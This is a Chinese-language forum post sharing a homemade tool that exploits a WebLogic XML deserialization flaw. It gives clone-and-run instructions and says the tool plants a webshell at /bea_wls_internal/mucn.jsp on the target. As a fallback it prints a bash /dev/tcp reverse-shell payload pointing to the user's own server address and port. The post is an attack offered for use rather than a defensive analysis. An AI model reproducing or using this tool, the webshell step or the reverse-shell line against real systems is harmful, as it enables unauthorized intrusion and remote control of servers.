无名 发表于 2022-5-8 17:04:58

【自制poc】weblogicXML反序漏洞

weblogic xml反序poc

地址:https://gitee.com/mucn/weblogic

weblogicXML
Description
weblogicXML漏洞检测利用工具

所需配置项:
python3+
requests模块
模块安装:
没用装request模块的运行如下命令安装模块

pip install requests

使用方法:
git clone https://gitee.com/mucn/weblogic
python3 weblogicXML.py

可能会出现的问题:
输入地址后程序长时间无反应或等待一段时间后出现报错。

如图1

解决方法:可能木马已经写入成功,请自行访问目标网站/bea_wls_internal/mucn.jsp 若存在如下页面说明木马写入成功。

如图2

程序运行结果为:目标可能存在weblogicXML反序漏洞,但写马失败,请自行手动检测
解释:木马应该确实没有写入成功。

如图3

解决:你可以使用burp发包方式向目标发送POC,进行反弹shell测试(一般这种是可以成功反弹shell的)。

反弹shell POC


/bin/bash

-c

bash -i >& /dev/tcp/服务器地址/服务器端口 0>&1

其他问题:暂无
http://cdn.u1.huluxia.com/g4/M00/49/D5/rBAAdl9jJh2AKvYmAAECGKu6otY148.pnghttp://cdn.u1.huluxia.com/g4/M00/49/D5/rBAAdl9jJh2AICg7AAA2J_OCW-8140.pnghttp://cdn.u1.huluxia.com/g4/M00/49/D5/rBAAdl9jJh6AWy4XAADegcpntRI125.pnghttp://cdn.u1.huluxia.com/g4/M00/49/D5/rBAAdl9jJh6AKI4xAADSX8Jjn1c711.png
页: [1]
查看完整版本: 【自制poc】weblogicXML反序漏洞